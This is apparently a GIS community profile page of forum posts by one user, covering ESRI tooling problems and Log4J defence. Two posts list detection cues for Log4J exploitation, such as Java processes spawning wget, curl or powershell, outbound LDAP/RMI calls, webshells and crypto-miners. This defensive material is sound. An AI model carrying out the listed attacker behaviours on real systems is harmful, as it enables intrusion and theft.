Latest Contributions by ErikLash1

Thank you. This is exactly what I needed to recreate tile cache in a federated server. Your solution should be added to ESRIs documentation.  ... View more

To provide an actionable answer to the question of "what does an exploit look like" there are a few quick and easy things that GIS administrators can check in their systems: Most adversaries use a different IP to scan than they do to listen for incoming victims machines - tracking listening IPs from known treat actors is far more valuable to than scanning IPs. An outbound connection or listening wait from a GIS machine to a known threat actor listening IP may be the easiest IoC to scan for. This can easily be accomplished using NetStat in windows. Activity or connection from a GIS machines Java processes that does not conform to regular ESRI implementation parameters such as Java child processes calling wget, curl, or powershell commands. This is another easy IoC review that can be undertaken by GIS administrators. Outbound LDAP and RMI and rogue JRMI or LDAP requests to external servers is a little more complex review but can be monitored in real time. If possible after determination if LDAP connections are required on your machines, blocking those connections is a good way to close the door entirely on that vector. Scanning for webshells is super important. Webshells are not only an IoC for successful Log4J exploitation they are extremely common in other attacks. Scan for and detect payload execution on a machine for post-exploitation activities. Many of these activities will be easily noticed even if endpoint security is not up to date - crypto-currency mining software (one of the most common early post exploit activities) will consume the systems resources. Others that will generate unique signatures include Mirai and BazarLoader. Let's keep the list going - what else will a successful exploit look like and what are the methods you are undertaking as you mitigate on your systems?   ... View more

Not aware of any successful exploit of an ESRI system. However, IoCs will rarely be visible if a perpetrator is successful.  Log4J vulnerability is much like a door - an access route vs the actual objective which is often to move lateral and establish a further exploit somewhere else in the system. We analyze our IIS logs using an increasingly complex REGEX filtering for 200 returns. A full RCE chain will require round trip communication - each day our logs see thousands of attempts being made to leverage Log4J holes. Every 200 return delivers a payload back to the offending IP and it is through following the successful 200 connections that also meet REGEX on which we undertake our exploit hunting exercises. We also combine that with system scanning using professional services that employ actual PoC to scan systems. Entry prevention is really about layers. Network monitoring software, Perimeter firewalls, WAF, Load Balancer and Gateway configuration for security, system configuration to allow only the necessary ports and types of traffic and maybe most importantly component and version upgrades to the newest available versions when those versions are released. Can not stress enough that users should follow ESRI guidance and upgrade to 10.9.1 to take advantage of better security under the hood within the actual components included in the 10.9.1 distribution. That's the last line of defense should someone make it through the other security layers that organizations implement. We installed/uninstalled Pro on our datastore machine to undertake the mitigation scripting. Not the most elegant Python solution but easy to accomplish. ... View more

Ran the Github check: 10.9.1 GIS Server ships with log4j 2.14.1. Have not checked other components in 10.9.1 10.8.1 Enterprise has a mix including 2.11.1 ESRI public release states (for 10.8.x and up) that "You will still see vulnerable Log4j version numbers on these systems, however it is not exploitable as their Java Runtime Environments (JRE) do not execute the code." Be careful with logic when thinking that 10.3.1 and other older versions with 1.x are not vulnerable simply because not popping in the check. From Apache for those on older/EOL Enterprise: Please note that Log4j 1.x has reached end of life and is no longer supported. Vulnerabilities reported after August 2015 against Log4j 1.x were not checked and will not be fixed. Hope this helps. ... View more

We have a couple workarounds in play in my org. Jupyter Notebook custom shortcuts to open JN on the UNC path. VS Code (though ESRI won't officially support it). VS Code is ideal for working in Notebooks as the user can go back and forth between all utilized code platforms in the same interface and work with PY files on the same screen as .IPYNB or open multiple IPYNB at the same time in the same screen (copying code blocks from one to the other). Current limitation on VS Code with ESRI JN is  that map widgets don't work but I use it all the time with ESRI notebooks for enterprise administration + data maintenance where map widget not needed.  Also build my notebooks in it then open them in either JN or Pro if map widget required for end user. VS Code for ESRI also makes linting easy. ... View more

+1 this error started showing up recently on our server 10.8.1 and appears to be related to utility network services in our system. ... View more

Thanks for the replies. Using the DLL solution looks promising. Will try it out.  In my case it's not a spatial function thats needed though. It's a non-spatial table edit that's not working. We bang the entire dataset up against a 3'rd party API which returns a new data table containing the results of the bangup. We then import that table using ESRI tools into a database. Update query later performed to add certain values from the returned table to certain rows in the spatial table based upon a non-spatial table join and a where clause.  SQL logic works fine if we take the extra step of moving the data from the mobile geodatabase to an enterprise geodatabase and then moving it back. Extra steps using extra tools as a workaround to functionality that should already be available in SQLite and is available in the non-ESRI SQlite. Alternatively, using ESRI tools to create a permanent table join, perform table update in python, delete extra fields works. Again extra steps when SQLite can handle the entire process with 2 lines of SQL code already. And magnitudes of time slower in performance than acting directly on the database through SQL. The SQL is fairly basic, summarized in this example: UPDATE table1 SET columnX = (SELECT columnY FROM table2 WHERE table1.column1 = table2.column1); As a precursor to this we run an unmatched query using a left out join to determine what data gets sent to the API for return with new field data for update/integration into the SQLite DB. Ideal solution would be one where scheduling or manually running a single SQL script to run on the database would handle the weekly data update. This kind of functionality is also something we are hoping someday extends to file geodatabases as well. Support requirement is for offline users who are often working with no internet connection. ... View more

Thanks for the valuable information in this thread. Super important disclaimers noted here that ESRI should be making public to potential users of SQLite made from Pro. I've been stuck trying to make a simple update query work (like was totally possible with MS Access) in a Mobile Geodatabase and getting the "no such function: UpdateIndexEntry" error.  Spent the last day trying to troubleshoot my machine b/c the query functions perfectly fine in SQL Fiddle and DB Fiddle using test data via SQLite but was erroring out locally in DB Browser and DBeaver. If we can't update attribute data in SQLite it's a show stopper limitation for the work I need to be doing with attribute tables on feature classes - updating hundreds of thousands of attributes manually not an option, nor is field calculator due to the slowness of Python [SQL not available for SQLite in Field Calculator]. Updatecursors cumbersome, again because of the Python translation that's needed to work with DBs to undertake the kind of work that we need done. SQL native is simplest, fastest, and best approach.  ... View more

+1 affected by this problem. Working with a project that runs entirely on UNC paths b/c it gets worked with via a batch server on the networrk and multiple data servers are involved , not just a specific machine. When trying to create a new notebook or "add" a Notebook in the Pro 2.7.3 project for creating and working with pandas to explore data am denied by the UNC error message "Cannot load a notebook from a UNC path" in both the default and clone environments. UNC Notebooks working fine in my environment from from outside of ArcGIS Pro in Command Line, Jupyter shortcuts, and even VSCode. ... View more

Not sure if anyone answered your question regarding making it work with Enterprise. The answer is yes it will work with any 'portal' of whether that portal is enterprise on premesis, cloud, or arcgisonline.  Just enter the details of the portal under the login comment at the top. # Log in username, password = provide_credentials() my_agol = GIS("https://yourEnterprise.com/PortalWebadaptor", username, password) If the variable name "my_agol" seems a bit like a mental roadblock, you can rename it throughout the script to something like "my_portal".  Egge-Jan shared a highly adaptable and fantastically useful nugget of code here that makes short work of pulling info into spreadsheets about users and groups. If like me you want the code to work on all your portals without much modification there are a few things you can do such as automatically naming your output csv by pulling the portal name directly via implementation of "my_portal.properties.portalName" in the fname= variable. ... View more

Easiest way to get it to get it to automatically open in Excel as a table is to change the delimiter to a comma from a semi colon.  Since we can use whatever delimeters we wish the decision on what to include here is based on the needs of the client application that will be consuming the output.  ... View more

Yep. Spyder notebooks does what I need - mostly using it for code validation/qc and integrating arcpy.  When it comes time to run things into production functionality am switch back over to a Jupyter environment for the graphical capabilities. As an aside, found the issue with the NodeJS npm error when bringing Jupyter Labs online with Pros environment - jupyterlab_server package included with Pro required a package update to make it compliant with the newer jupyterlab package. Got everything working in Pro 2.6.1 Jupyter Labs including matplotlib and jupyter dashboards. ... View more

Working now ... even Spyder Notebooks. Have only tested basic functionality so don't know if anything is still amiss. https://community.esri.com/message/950872-re-another-pro-26-clone-problem?commentID=950872#comment-950872  ... View more

Got everything working in the clone. Found that in my clones something was going wrong with the installers - behavior was not as expected. NodeJS was particularly troublesome. It was installing but the required updates to associated packages were not being installed no matter how I tried. It was also only able to install 14.9 even though I tried to force lower versions. Ended up updating all packages in the default clone manually then trying nodejs again. At that point 10.13.0 installed and it all came together. No more npm errors. Able to get jupyter lab running properly.  Then installed Spyder and Spyder Notebook.  Everything working now but to get it working had to delete my older clones and the contents of C:\Users\user\AppData\Local\ESRI\conda\ and start over. BTW: found that one of the problems I was encountering with Spyder was this bug in the hover tool. Simply disabled hover ability to fix. - Spyder 4.0.0 Tool Tips  Thanks everyone who gave me assistance on this ... ... View more